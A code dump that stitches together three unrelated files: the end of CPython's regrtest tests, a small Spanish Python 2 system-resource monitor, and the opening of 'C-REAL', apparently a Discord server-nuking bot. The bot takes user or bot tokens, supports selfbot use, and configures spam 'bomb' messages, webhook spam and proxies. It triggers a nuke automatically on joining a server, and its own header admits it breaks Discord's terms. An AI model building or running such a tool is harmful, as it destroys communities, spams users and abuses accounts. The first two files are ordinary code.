self.check_executed_tests(output, [testname],
env_changed=[testname],
fail_env_changed=True)
def test_multiprocessing_timeout(self):
code = textwrap.dedent(r"""
import time
import unittest
try:
import faulthandler
except ImportError:
faulthandler = None
class Tests(unittest.TestCase):
# test hangs and so should be stopped by the timeout
def test_sleep(self):
# we want to test regrtest multiprocessing timeout,
# not faulthandler timeout
if faulthandler is not None:
faulthandler.cancel_dump_traceback_later()
time.sleep(60 * 5)
""")
testname = self.create_test(code=code)
output = self.run_tests("-j2", "--timeout=1.0", testname, exitcode=2)
self.check_executed_tests(output, [testname],
failed=testname)
self.assertRegex(output,
re.compile('%s timed out' % testname, re.MULTILINE))
def test_unraisable_exc(self):
# --fail-env-changed must catch unraisable exception.
# The exception must be displayed even if sys.stderr is redirected.
code = textwrap.dedent(r"""
import unittest
import weakref
from test.support import captured_stderr
class MyObject:
pass
def weakref_callback(obj):
raise Exception("weakref callback bug")
class Tests(unittest.TestCase):
def test_unraisable_exc(self):
obj = MyObject()
ref = weakref.ref(obj, weakref_callback)
with captured_stderr() as stderr:
# call weakref_callback() which logs
# an unraisable exception
obj = None
self.assertEqual(stderr.getvalue(), '')
""")
testname = self.create_test(code=code)
output = self.run_tests("--fail-env-changed", "-v", testname, exitcode=3)
self.check_executed_tests(output, [testname],
env_changed=[testname],
fail_env_changed=True)
self.assertIn("Warning -- Unraisable exception", output)
self.assertIn("Exception: weakref callback bug", output)
def test_threading_excepthook(self):
# --fail-env-changed must catch uncaught thread exception.
# The exception must be displayed even if sys.stderr is redirected.
code = textwrap.dedent(r"""
import threading
import unittest
from test.support import captured_stderr
class MyObject:
pass
def func_bug():
raise Exception("bug in thread")
class Tests(unittest.TestCase):
def test_threading_excepthook(self):
with captured_stderr() as stderr:
thread = threading.Thread(target=func_bug)
thread.start()
thread.join()
self.assertEqual(stderr.getvalue(), '')
""")
testname = self.create_test(code=code)
output = self.run_tests("--fail-env-changed", "-v", testname, exitcode=3)
self.check_executed_tests(output, [testname],
env_changed=[testname],
fail_env_changed=True)
self.assertIn("Warning -- Uncaught thread exception", output)
self.assertIn("Exception: bug in thread", output)
def test_print_warning(self):
# bpo-45410: The order of messages must be preserved when -W and
# support.print_warning() are used.
code = textwrap.dedent(r"""
import sys
import unittest
from test import support
class MyObject:
pass
def func_bug():
raise Exception("bug in thread")
class Tests(unittest.TestCase):
def test_print_warning(self):
print("msg1: stdout")
support.print_warning("msg2: print_warning")
# Fail with ENV CHANGED to see print_warning() log
support.environment_altered = True
""")
testname = self.create_test(code=code)
# Expect an output like:
#
# test_threading_excepthook (test.test_x.Tests) ... msg1: stdout
# Warning -- msg2: print_warning
# ok
regex = (r"test_print_warning.*msg1: stdout\n"
r"Warning -- msg2: print_warning\n"
r"ok\n")
for option in ("-v", "-W"):
with self.subTest(option=option):
cmd = ["--fail-env-changed", option, testname]
output = self.run_tests(*cmd, exitcode=3)
self.check_executed_tests(output, [testname],
env_changed=[testname],
fail_env_changed=True)
self.assertRegex(output, regex)
def test_unicode_guard_env(self):
guard = os.environ.get(setup.UNICODE_GUARD_ENV)
self.assertIsNotNone(guard, f"{setup.UNICODE_GUARD_ENV} not set")
if guard.isascii():
# Skip to signify that the env var value was changed by the user;
# possibly to something ASCII to work around Unicode issues.
self.skipTest("Modified guard")
def test_cleanup(self):
dirname = os.path.join(self.tmptestdir, "test_python_123")
os.mkdir(dirname)
filename = os.path.join(self.tmptestdir, "test_python_456")
open(filename, "wb").close()
names = [dirname, filename]
cmdargs = ['-m', 'test',
'--tempdir=%s' % self.tmptestdir,
'--cleanup']
self.run_python(cmdargs)
for name in names:
self.assertFalse(os.path.exists(name), name)
class TestUtils(unittest.TestCase):
def test_format_duration(self):
self.assertEqual(utils.format_duration(0),
'0 ms')
self.assertEqual(utils.format_duration(1e-9),
'1 ms')
self.assertEqual(utils.format_duration(10e-3),
'10 ms')
self.assertEqual(utils.format_duration(1.5),
'1.5 sec')
self.assertEqual(utils.format_duration(1),
'1.0 sec')
self.assertEqual(utils.format_duration(2 * 60),
'2 min')
self.assertEqual(utils.format_duration(2 * 60 + 1),
'2 min 1 sec')
self.assertEqual(utils.format_duration(3 * 3600),
'3 hour')
self.assertEqual(utils.format_duration(3 * 3600 + 2 * 60 + 1),
'3 hour 2 min')
self.assertEqual(utils.format_duration(3 * 3600 + 1),
'3 hour 1 sec')
if __name__ == '__main__':
unittest.main()
|
monitor3b.py | # *-* encoding: utf-8 *-*
#!/usr/bin/python
import threading
import commands
import os, sys
import time
semaforo=threading.Semaphore(0) #Se señaliza con un semaforo
def multiProc():
os.system("clear")
print "\t\t\t Ejemplo de multiprocesamiento"
print "\nEste es solo un ejemplo de como crear multiprocesos.\n"
def worker():
print threading.currentThread().getName(), 'Lanzado' #Se crea el hilo y obtiene su nombre
time.sleep(5)
print threading.currentThread().getName(), 'Deteniendo'
def servicio():
print threading.currentThread().getName(), 'Lanzado'
time.sleep(5)
print threading.currentThread().getName(), 'Deteniendo'
t = threading.Thread(target=servicio, name='Servicio')
w = threading.Thread(target=worker, name='Worker:')
z = threading.Thread(target=worker)
w.start()
time.sleep(3)
z.start()
time.sleep(5)
t.start()
time.sleep(30)
semaforo.release()
return 0
def Processor():
os.system("clear")
print "\t\t\t Procesador"
mod=commands.getoutput("cat /proc/cpuinfo | grep \"model name\"")
cores=commands.getoutput("cat /proc/cpuinfo | grep \"cpu cores\"")
bugs=commands.getoutput("cat /proc/cpuinfo | grep \"bugs\"")
addSize=commands.getoutput("cat /proc/cpuinfo | grep \"address sizes\"")
mhz=commands.getoutput("cat /proc/cpuinfo | grep \"cpu MHz\"")
print "Modelo de procesador:\n" + mod + "\n"
print "Nucleos:\n" + cores + "\n"
print "Vulnerabilidades:\n" + bugs + "\n"
print "Tamaño de directorios:\n" + addSize + "\n"
print "MHz del procesador:\n" + mhz + "\n"
time.sleep(30)
semaforo.release()
return 0
def vmstat():
os.system("clear")
var = commands.getoutput('vmstat -s -S M') #Se guarda la cadena de version en 'var'
print var #Impresión de 'ver' para mostrar la version del sistema
#print "\n\n\nPresione ctrl+c para regresar al menu\n"
time.sleep(20)
semaforo.release() #Libera al hilo opcion para regresar al hilo menu
return 0
def Utime():
os.system("clear")
print " Fecha---Tiempo en uso"
tTotal = commands.getoutput('uptime -s -S M')
print tTotal
time.sleep(20)
semaforo.release() #Libera al hilo opcion para regresar al hilo menu
return 0
def Interrupc():
os.system("clear")
print " Interrupciones"
inter = commands.getoutput('interrupts -s -S M')
print inter
time.sleep(20)
semaforo.release() #Libera al hilo opcion para regresar al hilo menu
return 0
def Menu():
global semaforo
opt='0'
while opt != '6':
os.system("clear")
op={'1':multiProc, '2':Processor, '3':vmstat, '4':Utime, '5':Interrupc}
print "\t\t\t\t Monitor de Recursos\n\n"
print "\t1. Ejemplo de multiprocesamiento.\n"
print "\t2. Caracteristicas del procesador.\n"
print "\t3. Reporte de Memoria Virtual\n"
print "\t4. Tiempo encendido.\n"
print "\t5. Interrupciones.\n"
print "\t6. Salir\n"
opt=raw_input( "\n\t>> ")
try:
res=op[opt]()
semaforo.acquire()
except:
if opt != '6':
print "Opcion invalida"
Menu() |
c-realV2.py | #!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
MIT License
Copyright (c) 2020 - 2021
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
Don't use the bot on real servers or use it to spam because this is breaking
discord's ToS, and you will be resulted in an account deletion.
"""
# discord
import discord, sys, requests, os, time
from discord.ext import commands
import asyncio
from packaging import version
from random import randint, choice, randrange, random, choices
from threading import Thread
from inputimeout import inputimeout, TimeoutOccurred
from queue import Queue
from io import BytesIO
from pathlib import Path
from math import ceil
from copy import deepcopy
if sys.platform == 'linux':
import simplejson as json
else:
import json
# style
from colorama import init, Fore
init(autoreset=True)
#
__TITLE__ = "C-REAL"
__VERSION__ = "2.4.0"
__AUTHOR__ = "TKperson"
__LICENSE__ = "MIT"
# Global vars
per_page = 15
commands_per_page = 5
number_of_bomb_default = 250
selected_server = None
sorted_commands = []
webhook_targets = []
saved_ctx = None
nuke_on_join = False
auto_nick = False
auto_status = False
selfbot_has_perm = False
timeout = 6
fetching_members = False
bad_filename_map = dict((ord(char), None) for char in '<>:"\\/|?*')
grant_all_permissions = False
# normal functions==============
def exit():
try:
input('Press enter to exit...')
except (EOFError, KeyboardInterrupt):
pass
sys.exit(1)
def banner():
"""Handler for non-unicode consoles"""
sys.stdout.buffer.write(f'''\
██████╗ ██████╗ ███████╗ █████╗ ██╗
██╔════╝ ██╔══██╗██╔════╝██╔══██╗██║ Version: {__VERSION__}
██║ █████╗ ██████╔╝█████╗ ███████║██║ Made by:
██║ ╚════╝ ██╔══██╗██╔══╝ ██╔══██║██║ TKperson
╚██████╗ ██║ ██║███████╗██║ ██║███████╗ and
╚═════╝ ╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ cyxl
'''.encode('utf8'))
if version.parse('1.5.1') > version.parse(discord.__version__):
print('Please update your discord.py.')
exit()
settings = {"token":None,"permissions":[],"bot_permission":"2146958847","command_prefix":".","bot_status":"offline","verbose":15,"bomb_messages":{"random":None,"fixed":[]},"webhook_spam":{"usernames":[],"pfp_urls":[],"contents":[]},"after":[],"proxies":[],"ban_whitelist":[]}
def setUp():
# check location
from glob import glob
config = None
config_parent_dir = os.path.join(Path().absolute().__str__(), 'data')
config_path = os.path.join(config_parent_dir, 'default.json')
json_paths = glob(os.path.join(Path().absolute().__str__(), 'data', '*.json'))
def getConfig(choice, timeout):
while True:
# it really doesn't matter if I use triple quotes or not.... the speed is going to be the same and doing this looks better
print('=========================')
print('| |')
print('| [{0}] Load default.json |'.format('1' if 1 in choice else 'x'))
print('| [{0}] Select .json file |'.format('2' if 2 in choice else 'x'))
print('| [{0}] Create a new json |'.format('3' if 3 in choice else 'x'))
print('| |')
print('=========================')
print('[x] = not Available;')
try:
response = inputimeout(prompt='Auto boot with choice [1] in %d seconds...\nChoose 1, 2, or 3\n>> ' % timeout, timeout=timeout)
except TimeoutOccurred:
response = '1'
if response == '1':
if not os.path.isfile(config_path):
print(f'Unable to find file: {config_path}')
continue
with open(config_path, 'r', encoding='utf8') as f:
try:
return json.loads(f.read())
except json.decoder.JSONDecodeError:
print(f'There are some errors occured when reading the configuration file. File path -> {config_path}\nI recommend you use https://jsonlint.com/?code= to help checking the configuration file. Skipping reading the default.json file...')
break
elif response == '2':
while True:
print('=========================')
print('0) Go back')
for i, path in enumerate(json_paths):
print(f'{str(i+1)}) {path}')
index = input('Select the .json file.\n>> ')
if not index.isdigit() or not (0 <= (index := int(index)) <= len(json_paths)):
print(f'You need to enter an integer that is between or on 0 and {str(len(json_paths))}')
continue
if index == 0:
timeout = 999999
break
with open(json_paths[index-1], 'r', encoding='utf8') as f:
try:
return json.loads(f.read())
except json.decoder.JSONDecodeError:
print(f'There are some errors occured when reading the configuration file. File path -> {config_path}\nI recommend you use https://jsonlint.com/?code= to help checking the configuration file. Skipping reading the default.json file...')
elif response == '3':
break
global settings, settings_copy
if os.path.isfile(config_path): # have default.json
config = getConfig([1,2,3], 5)
elif len(json_paths) > 0: # dont have default.json but have other .json file
config = getConfig([2,3], 999999)
if config is not None:
settings.update(config)
else:
try:
# from getpass import getpass
# settings['token'] = getpass('Enter token. Note: Whatever you entered here will not be displayed.\n>> ')
settings['token'] = input('Enter token. Note: Whatever you entered here will not be displayed.\n>> ')
settings['permissions'].append(input('\nEnter your discord tag or user ID. It is recommended to use discord user ID because some unicode names are hard for the code to check.\n>> '))
except KeyboardInterrupt:
sys.exit(0)
except EOFError:
print('Invalid input/EOFError. This may be caused by some unicode.')
exit()
print('\nTips:')
print('The default command_prefix is: .')
print(f'Your currect command_prefix is: {settings["command_prefix"]}')
print(f'Use {settings["command_prefix"]}config to config the settings and more info about how to config.\n')
print('Join our discord https://discord.gg/REMwN7s68S')
settings_copy = deepcopy(settings)
setUp()
# token, permissions, bomb_messages, webhook_spam, bot_permission, command_prefix, bot_status, verbose, after, proxies = readJson()
want_log_request = want_log_console = want_log_message = want_log_errors = 0
def updateVerbose():
global want_log_request, want_log_console, want_log_message, want_log_errors
verbose = settings['verbose']
want_log_request = verbose & 1 << 0
want_log_console = verbose & 1 << 1
want_log_message = verbose & 1 << 2
want_log_errors = verbose & 1 << 3
updateVerbose()
# def randomProxy(protocol):
# # As long it works fine then i'm using this method
# if proxies is None or len(proxies) == 0:
# return None
# return {protocol: choice(proxies)}
is_selfbot = True
headers = {}
def checkToken(token=None):
if token is None:
token = settings['token']
global is_selfbot, headers
try:
headers = {'authorization': token, 'content-type': 'application/json'}
print('Checking selfbot token.', end='\r')
if not 'id' in requests.get(url='https://discord.com/api/v8/users/@me', timeout=timeout, headers=headers).json():
# This is the hardest thing that I have tried to find in my life took me ages to know "Bot <token>" is actually the bot's authorization
# Reading source codes is always a good thing :)
headers['authorization'] = 'Bot ' + token
print('Checking normal bot token.', end='\r')
if not 'id' in requests.get(url='https://discord.com/api/v8/users/@me', timeout=timeout, headers=headers).json():
print('Invalid token is being used.')
exit()
else:
is_selfbot = False
# except requests.exceptions.ProxyError:
# print('Bad proxy is being used. You can try to change a proxy or restart the bot.')
# exit()
# except requests.exceptions.ConnectTimeout:
# print(f'Proxy reached maximum load time: timeout is {timeout} seconds long.')
# exit()
except requests.exceptions.ConnectionError:
print('You should probably consider connecting to the internet before using any discord related stuff. If you are connected to wifi and still seeing this message, then maybe try turn off your VPN/proxy/TOR node. If you are still seeing this message or you just don\'t what to turn off vpn, you can try to use websites like repl/heroku/google cloud to host the bot for you. The source code is on https://github.com/TKperson/Nuking-Discord-Server-Bot-Nuke-Bot.')
exit()
except (requests.exceptions.InvalidHeader, json.decoder.JSONDecodeError):
print('Invalid token is being used.')
exit()
checkToken()
### check updates
print('Checking update... ', end='\r')
github_version = requests.get('https://raw.githubusercontent.com/TKperson/Nuking-Discord-Server-Bot-Nuke-Bot/master/VERSION.txt').text
if version.parse(github_version) > version.parse(__VERSION__):
print(f'New C-REAL update has been launched -> {github_version} <- :party:')
print('Loading scripts...' + ' ' * 15, end='\r')
"""
command_prefix - command prefix
case_insensitive - commands will be callable without case retrictions if this is set to true
self_bot - self_bot: :class:`bool`
If ``True``, the bot will only listen to commands invoked by itself rather
than ignoring itself. If ``False`` (the default) then the bot will ignore
itself. This cannot be changed once initialised.
intents - intents: :class:`Intents`
The intents that you want to enable for the session. This is a way of
disabling and enabling certain gateway events from triggering and being sent.
If not given, defaults to a regularly constructed :class:`Intents` class.
"""
async def determine_prefix(bot, message): # https://stackoverflow.com/questions/56796991/discord-py-changing-prefix-with-command
return settings['command_prefix']
# client = commands.Bot(command_prefix=determine_prefix, case_insensitive=True, self_bot=is_selfbot, proxies=randomProxy('http'))
client = commands.Bot(command_prefix=settings['command_prefix'], case_insensitive=True, self_bot=is_selfbot, intents=discord.Intents().all())
client.remove_command('help')
######### Events #########
@client.event
async def on_connect():
if is_selfbot:
for user in settings['permissions']:
if str(client.user.id) == user or f'{client.user.name}#{client.user.discriminator}' == user:
global selfbot_has_perm
selfbot_has_perm = True
settings['permissions'].append(str(client.user.id))
global sorted_commands
sorted_commands = sorted(client.commands, key=lambda e: e.name[0])
await changeStatus(None, settings['bot_status'])
@client.event
async def on_ready():
banner()
print('/+========================================================')
print(f'| | {Fore.GREEN}Bot ready.')
print(f'| {Fore.MAGENTA}+ Logged in as')
print(f'| | {client.user.name}#{client.user.discriminator}')
print(f'| | {client.user.id}')
print(f'| {Fore.MAGENTA}+ Permission given to ')
for permission in settings['permissions']:
print(f'| | {permission}')
print(f'| {Fore.MAGENTA}+ Command prefix: ' + settings['command_prefix'])
if is_selfbot:
print(f'| {Fore.YELLOW}+ [Selfbot] This is a selfbot. Join servers with join codes.')
else:
print(f'| {Fore.YELLOW}+ https://discord.com/api/oauth2/authorize?client_id={client.user.id}&permissions={settings["bot_permission"]}&scope=bot')
print('| ~*************************************')
print('\\+-----')
@client.event
async def on_disconnect():
'''
on_disconnect - when the script is disconnected with the profile the bot will run this command
usage: reset status
'''
await changeStatus(None, 'offline')
### logs ###
async def log(ctx, message):
"""
Logging messages to the user
no args, but has settings.
Modes:
- Discord side
- coming soon
"""
if want_log_message:
# if not isDM(ctx) and ctx.guild.id == selected_server.id and 1 << 11 & selected_server.me.guild_permissions.value == 0:
# consoleLog(message, True)
# else:
try:
await ctx.send(message)
except discord.errors.HTTPException:
for i in range(ceil(len(message) / 2000)):
await log(ctx, message[2000 * i:2000 * (i + 1)])
except:
consoleLog(message)
def consoleLog(message, print_time=False):
if want_log_console:
TIME = ''
if print_time:
TIME = f'{Fore.MAGENTA}[{time.strftime("%H:%M:%S", time.localtime())}] {Fore.RESET}'
try:
print(f'{TIME}{message}')
except TypeError: # when there's a character that can't be logged with python print function.
sys.stdout.buffer.write(f'{TIME}{message}'.encode('utf8'))
@client.event
async def on_command_error(ctx, error):
# source: https://gist.github.com/AileenLumina/510438b241c16a2960e9b0b014d9ed06
# source: https://github.com/Rapptz/discord.py/blob/master/discord/errors.py
"""
Error handlers
It's always a good idea to look into the source code to find things that are hard to find on the internet.
"""
# Debug mode
# raise error
if not want_log_errors or hasattr(ctx.command, 'on_error'):
return
# get the original exception
error = getattr(error, 'original', error)
# print(error)
# print(str(type(error)))
if isinstance(error, commands.CommandNotFound):
if checkPerm(ctx):
try:
await log(ctx, f'Command `{ctx.message.content}` is not found.')
except discord.errors.HTTPException:
await log(ctx, 'That command is not found.')
elif isinstance(error, commands.CheckFailure):
pass
elif isinstance(error, discord.Forbidden):
await log(ctx, f'403 Forbidden: Missing permission.')
elif isinstance(error, discord.errors.HTTPException): # usually caused by sending over 2000 characters limit
# has already been handled in "def log"
pass
elif isinstance(error, commands.UserInputError):
await log(ctx, 'Invalid input.')
else:
# 'args', 'code', 'response', 'status', 'text', 'with_traceback'
# print(error)
# print(error.args)
# print(type(error.args))
try: # Don't want too many things logged into discord
await log(ctx, '%s' % error.args)
except discord.errors.NotFound: # When ctx.channel is deleted
pass
except TypeError: # When there's a charater that can't be logged into discord. Like if error.args contains a tuple which can't be automatically turned into a string.
consoleLog(f'{Fore.RED}Error -> {error.args}: {Fore.YELLOW}When using "{ctx.message.content}".', True)
if is_selfbot:
@client.event
async def on_message(message):
if message.content.startswith(settings["command_prefix"]) and checkPerm(await client.get_context(message)):
if message.author.id == client.user.id and not selfbot_has_perm:
consoleLog(f'{Fore.YELLOW}Account owner {Fore.LIGHTBLUE_EX}"{client.user.name}#{client.user.discriminator}" {Fore.YELLOW}tried to use {Fore.LIGHTBLUE_EX}"{message.content}"{Fore.BLUE}. Too bad, he/she doesn\'t of the power to use this bot.', True)
return
message.author = client.user
await client.process_commands(message)
@client.event
async def on_guild_join(guild):
if nuke_on_join:
global selected_server
selected_server = guild
await nuke(saved_ctx)
def isDM(ctx):
"""
No args
Checking if the ctx is whether from DM or in a server. There are different handlers for handling some commands.
"""
return isinstance(ctx.channel, discord.channel.DMChannel)
# if isinstance(ctx.channel, discord.channel.DMChannel):
# return True # in dm
# return False # in server
def nameIdHandler(name):
"""
<@! ID > = pinging user
<@& ID > = pinging role
Usage - remove the brakets around the ID
return - the ID
"""
if name.startswith('<@!') or name.startswith('<@&'):
return name[:-1][3:]
return name
async def embed(ctx, n, title, array):
"""
Parameters:
n - page number. And default is 1
title - Command name/title
array - The list for handling
"""
if not n.isdigit() or (n := int(n) - 1) < 0:
await log(ctx, 'Bad page number.')
return
names = ''
ids = ''
item_length = len(array)
if item_length == 0:
return await ctx.send(f'{title} count: 0')
init_item = n * per_page
final_item = init_item + per_page
if init_item > item_length - per_page:
if init_item > item_length:
await ctx.send('Invalid page number.')
return
final_item = init_item + (item_length % per_page)
else:
final_item = init_item + per_page
for i in range(init_item, final_item, 1):
item = array[i]
if len(item.name) > 17:
item.name = item.name[:17] + '...'
names += f'{item.name}\n'
ids += f'{str(item.id)}\n '
# if not isDM(ctx) and 1 << 11 & selected_server.me.guild_permissions.value == 0 and (selected_server is None or ctx.guild.id == selected_server.id):
# names = names.split('\n')
# ids = ids.split(' ')
# consoleLog(f'\n{Fore.GREEN}*{title}*\n{Fore.RESET}Total count: {Fore.YELLOW}{str(item_length)}\n{Fore.GREEN}__Name__{" " * 13}{Fore.CYAN}__ID__\n{ "".join([(Fore.GREEN + names[i].ljust(21) + Fore.CYAN + ids[i]) for i in range(len(names) - 1)]) }{Fore.YELLOW}{n+1}/{str(ceil(item_length / per_page))}', True)
# else:
try:
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = title,
description = f'Total count: {str(item_length)}; color: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Name', value=names, inline=True)
embed.add_field(name='ID', value=ids, inline=True)
embed.set_footer(text=f'{n+1}/{str(ceil(item_length / per_page))}')
await ctx.send(embed=embed)
except:
names = names.split('\n')
ids = ids.split(' ')
await ctx.send(f'```*{title}*\nTotal count: {str(item_length)}\n__Name__{" " * 13}__ID__\n{ "".join([(names[i].ljust(21) + ids[i]) for i in range(len(names) - 1)]) }{n+1}/{str(ceil(item_length / per_page))}```')
async def hasTarget(ctx):
"""
Checking if there's a selected server for using the comands.
"""
if selected_server is not None:
return True
elif not isDM(ctx):
await connect(ctx)
await log(ctx, f'You have been automatically `{settings["command_prefix"]}connect` to server `{selected_server.name}` because you are not connected to a server and using a command inside a server.')
return True
else:
await log(ctx, f'I am not connected to a server. Try `{settings["command_prefix"]}servers` and `{settings["command_prefix"]}connect`')
return False
def containing(a, b):
for c in a:
if c.name.lower() == b.lower() or str(c.id) == b:
return c
return None
def checkPerm(ctx):
if grant_all_permissions:
return True
for user in settings['permissions']:
if str(ctx.author.id) == user or f'{ctx.author.name}#{ctx.author.discriminator}' == user:
return True
if not isDM(ctx):
consoleLog(f'{Fore.LIGHTRED_EX}{ctx.author.name}#{ctx.author.discriminator} {Fore.RESET}tried to use {Fore.LIGHTYELLOW_EX}"{ctx.message.content}" {Fore.RESET}in server {Fore.LIGHTYELLOW_EX}"{ctx.guild.name}"{Fore.RESET}, at channel {Fore.LIGHTYELLOW_EX}"{ctx.channel.name}"{Fore.RESET}.', True)
else:
consoleLog(f'{Fore.LIGHTRED_EX}{ctx.author.name}#{ctx.author.discriminator} {Fore.RESET}tried to use {Fore.LIGHTYELLOW_EX}"{ctx.message.content}" {Fore.RESET}in {Fore.LIGHTYELLOW_EX}the bot\'s direct message{Fore.RESET}.', True)
return False
def fixedChoice():
return settings['bomb_messages']['fixed'][randint(0, len(settings['bomb_messages']['fixed']) - 1)]
base64_char = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/'
def random_b64(n=0):
return ''.join(choices(base64_char, k=settings['bomb_messages']['random'] if n == 0 else n))
alphanum = '0123456789!@#$%^&*ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
def random_an():
return ''.join(choices(alphanum, k=settings['bomb_messages']['random']))
def sendMessagePerm(ctx):
pass
def checkTalkPerm(ctx):
if isDM(ctx): # you can always talk in dm
return True
# return calcPerm(ctx, ) and 16384 & ctx.channel.
def configIsSaved():
# global settings_copy, settings # idk why python did this but after adding this for my 3.8.5 python it works
return settings_copy == settings
# class discordMember:
# def __init__(self, name, id_, discriminator=None, channel_id=None):
# self.name = name
# self.id = id_
# self.discriminator = discriminator
# self.channel_id = channel_id
# server_members = []
# def copyMember(author):
# server_members.append(discordMember(author['username'], author['id'], author['discriminator']))
# def autoFindChannel():
# for channel in selected_server.text_channels:
# for name in ['join', 'welcome', 'incoming']:
# if name in channel.name:
# return channel.id
# return None
######### Commands ##########
######### Listing ##########
@commands.check(checkPerm)
@client.command(name='help', aliases=['h', 'commands'])
async def help(ctx, asked_command=None):
help_list = '```'
if asked_command is None:
for command in sorted_commands:
help_list += f'[{command.name}] '
await ctx.send(help_list + f'\n\nYou can try {settings["command_prefix"]}help <command> to see all the aliases for the command. Or read the manual.md for more infomation about the commands.```')
else:
for command in sorted_commands:
if asked_command.lower() == command.name.lower():
help_command = f'```{settings["command_prefix"]}<{command.name}'
for aliase in command.aliases:
help_command += f'|{aliase}'
help_command += '>'
for param, default in command.params.items():
if param == 'ctx':
continue
if default.empty is not default.default:
help_command += ' {' + param + '=' + str(default.default) + '}'
else:
help_command += ' [' + param + ']'
if default.kind.name == 'KEYWORD_ONLY':
break
help_command += '```'
await ctx.send(help_command)
return
await log(ctx, f'Unable to find command `{asked_command}`.')
@commands.check(checkPerm)
@client.command(name='servers', aliases=['se', 'server'])
async def servers(ctx, n='1'):
await embed(ctx, n, 'Servers', client.guilds)
@commands.check(checkPerm)
@client.command(name='channels', aliases=['tc', 'textchannels', 'textchannel', 'channel'])
async def channels(ctx, n='1'):
if not await hasTarget(ctx):
return
await embed(ctx, n, 'Text channels', selected_server.text_channels)
@commands.check(checkPerm)
@client.command(name='roles', aliases=['ro', 'role'])
async def roles(ctx, n='1'):
if not await hasTarget(ctx):
return
await embed(ctx, n, 'Roles', selected_server.roles)
@commands.check(checkPerm)
@client.command(name='categories', aliases=['cat', 'category'])
async def categories(ctx, n='1'):
if not await hasTarget(ctx):
return
await embed(ctx, n, 'Categories', selected_server.categories)
@commands.check(checkPerm)
@client.command(name='voiceChannels', aliases=['vc', 'voicechannel'])
async def voiceChannels(ctx, n='1'):
if not await hasTarget(ctx):
return
await embed(ctx, n, 'Voice channels', selected_server.voice_channels)
@commands.check(checkPerm)
@client.command(name='emojis', alises=['em', 'emoji'])
async def emojis(ctx, n='1'):
if not await hasTarget(ctx):
return
await embed(ctx, n, 'Emojis', selected_server.emojis)
@commands.check(checkPerm)
@client.command(name='members', alises=['me', 'member'])
async def members(ctx, command='1', *, args=None):
if not await hasTarget(ctx):
return
print(len(selected_server.members))
await embed(ctx, command, 'Members', selected_server.members)
# global server_members
# if command.isdigit():
# if is_selfbot:
# await embed(ctx, command, 'Members', server_members)
# else:
# await embed(ctx, command, 'Members', selected_server.members)
# else:
# # def gFetchableChannel(channel_id): # check if the channel is good for fectching channel
# # pass
# if command == 'fetch':
# global fetching_members
# args = args.split()
# if not is_selfbot:
# await log(ctx, f'Fetch command is only made for selfbot; since you are using normal bots, all members in the server `{selected_server.name}` has already be fetched. Try `{settings["command_prefix"]}members` to see all the fetched members.')
# return
# if args[0].lower() == 'auto':
# channel_id = autoFindChannel()
# if channel_id is None:
# await log(ctx, f'Unable to find welcome channels. You have to enter the welcome channel\'s in server `{selected_server.name}` manually.')
# return
# elif args[0].lower() == 'stop':
# fetching_members = False
# await log(ctx, 'Fetching stopped.')
# return
# elif args[0].isdigit():
# channel_id = args[0]
# else:
# await log(ctx, 'Invalid argument: You can only enter `fetch auto` or `fetch <channel_id>`.')
# return
# # Making sure channel_id is a string
# channel_id = str(channel_id)
# if len(args) < 3:
# cooldown = 0
# elif args[2].isdigit():
# cooldown = int(args[2])
# else:
# await log(ctx, 'Please set a positive integer for the cooldown time of fetching every 100 messages. Use `0` if you don\'t want a cooldown.')
# return
# if args[1].lower() == 'fast':
# fetching_members = True
# url = f'https://discord.com/api/v8/channels/{channel_id}/messages?limit=100'
# await log(ctx, f'```Fetching has started.\nCheck progress: `{settings["command_prefix"]}members`\nStop fetching: `{settings["command_prefix"]}members fetch stop`.\nCooldown: `{cooldown}` seconds.\nNote: duplicated users will only get removed after the fetching stops.```')
# while fetching_members:
# r = requests.get(url, headers=headers, proxies=randomProxy('https'), timeout=timeout).json()
# if len(r) == 0:
# break
# for message in r:
# if message['mentions']: # len(message['content']) > 0 and
# for mention in message['mentions']:
# copyMember(mention)
# elif len(message['attachments']) > 0:
# pass # no handler for images
# elif len(message['embeds']) > 0:
# pass # no handlers for embeds mentions
# else:
# copyMember(message['author'])
# url = f'https://discord.com/api/v8/channels/{channel_id}/messages?before={r[-1]["id"]}&limit=100'
# if cooldown > 0:
# await asyncio.sleep(cooldown)
# elif args[1].lower() == 'all':
# await log(ctx, f'```Fetching has started.\nCheck progress: `{settings["command_prefix"]}members`\nStop fetching: `{settings["command_prefix"]}members fetch stop`.\nCooldown: `{cooldown}` seconds.\nNote: duplicated users will only get removed after the fetching stops.```')
# pass
# else:
# await log(ctx, 'You need to choose a fetching operation. Options are `all` or `fast`.')
# # Removing duplicates
# if len(server_members) > 1:
# temp = []
# temp.append(server_members[0])
# for member_ in server_members:
# for i in temp:
# temp.append(member_)
# server_members = temp
@commands.check(checkPerm)
@client.command(name='bans')
async def bans(ctx, n='1'):
if not await hasTarget(ctx):
return
await embed(ctx, n, 'Bans', [s.user for s in await selected_server.bans()])
@commands.check(checkPerm)
@client.command(name='connect', aliases=['con'])
async def connect(ctx, *, server=None):
if server is None and ctx.guild is None:
await log(ctx, f'Providing a server name is required.')
return
if server is None and not isDM(ctx):
server = ctx.guild
else:
temp_name = server
server = containing(client.guilds, server)
